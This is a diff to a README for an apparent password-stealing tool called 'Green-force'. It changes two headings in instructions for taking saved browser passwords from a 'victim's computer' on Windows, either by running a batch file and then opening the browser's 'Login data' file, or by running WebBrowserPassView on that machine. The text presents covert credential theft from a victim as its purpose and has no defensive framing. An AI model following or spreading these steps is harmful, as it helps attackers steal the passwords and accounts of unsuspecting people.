vaginessa/Green-force/README.md

 > copy passwords and you will can go to celebrate it!!!

-(If you want to hack passwords slowly in Batch version:)
+(If you want to hack passwords slowly with batch library:)

 > Open bat file on victim’s computer (works only in windows).

 > Open Login data after bat process.
 (If file are locked on Mac OS open it with command «mc» (brew install mc))

-(If you want to hack passwords fastely:)
+(If you want to hack passwords fastely with WebBrowserPassView:)

 > Open WebBrowserPassView in green force on victim's computer (works only in windows)